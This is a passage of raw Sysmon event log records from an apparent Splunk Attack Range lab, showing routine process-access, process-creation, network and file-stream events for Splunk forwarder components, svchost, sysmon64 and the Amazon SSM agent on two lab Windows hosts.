Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D57E44F68E89430CED0362DA38BCA93,SHA256=D990BB57A59EAC7BAA938EA7F612116B77C444715E5A5F11A99E2E614BB07A16,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104299Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:01.328{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-ACA7-615A-1100-00000000FC01}360C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000104298Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:59.459{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49590-false10.0.1.12-8000- 23542300x800000000000000082183Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:02.740{2FDD8D40-AC9A-615A-1C00-00000000FD01}1896NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a5ffc3526a1e15c5\channels\health\respondent-20211004072621-027MD5=CD243B6FFA786E96F03F03FFF6EEA1F9,SHA256=BD72F37F00391F7EDFD796CB74D802386D2E764AAC9DEBCA5D4587784D6F99D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082182Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:02.644{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF27FB03F108A3CB8FEBE4DFCDDB125A,SHA256=027D8BDE9D3772BF0678F3E6EC61396F8C72F8A7A02E812C2AB1BCC320CBA29B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104310Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:02.578{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D6CCD02DBF1B0AEA923817EFE1607E9,SHA256=C3DAFCD8E1DEB69AC233EE7B869160DF6CAA67C524CAE6E6EB9C9B9506A3DB60,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104309Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:02.422{58E9C193-B356-615A-EC01-00000000FC01}55845292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104308Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:02.203{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B356-615A-EC01-00000000FC01}5584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104307Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:02.203{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104306Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:02.203{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104305Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:02.203{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104304Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:02.203{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104303Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:02.203{58E9C193-ACA4-615A-0500-00000000FC01}412428C:\Windows\system32\csrss.exe{58E9C193-B356-615A-EC01-00000000FC01}5584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104302Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:02.203{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B356-615A-EC01-00000000FC01}5584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104301Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:02.204{58E9C193-B356-615A-EC01-00000000FC01}5584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000104333Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:03.892{58E9C193-B357-615A-EE01-00000000FC01}57605844C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104332Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:03.703{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B357-615A-EE01-00000000FC01}5760C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104331Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:03.703{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104330Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:03.703{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104329Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:03.703{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104328Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:03.703{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104327Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:03.703{58E9C193-ACA4-615A-0500-00000000FC01}4126816C:\Windows\system32\csrss.exe{58E9C193-B357-615A-EE01-00000000FC01}5760C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104326Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:03.703{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B357-615A-EE01-00000000FC01}5760C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104325Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:03.705{58E9C193-B357-615A-EE01-00000000FC01}5760C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000104324Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:03.656{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1DBAF6B267F4D886F7B066E5EB75BA6,SHA256=25735FDEB620D3122413CEB743802FE1E5E6C00B35417CF6AB8A3170DE33346C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082185Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:03.754{2FDD8D40-AC9A-615A-1C00-00000000FD01}1896NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a5ffc3526a1e15c5\channels\health\surveyor-20211004072618-028MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082184Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:03.659{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB4333A3B1B6D2A64E2E59BA0D207D58,SHA256=738CE9C6C048B757BB57BBA32326D16A4D652F8EA70969474221DDE7D163CA38,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104323Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:03.359{58E9C193-B357-615A-ED01-00000000FC01}52965636C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000104322Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:03.250{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=13300F684275456DB57FA363B280D4D0,SHA256=07D1753E71F7D59CA7CCB6AF7FD243BA7A1D4C302AFA527DFE8E7BA870B1121A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104321Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:03.187{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B357-615A-ED01-00000000FC01}5296C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104320Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:03.187{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104319Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:03.187{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104318Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:03.187{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104317Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 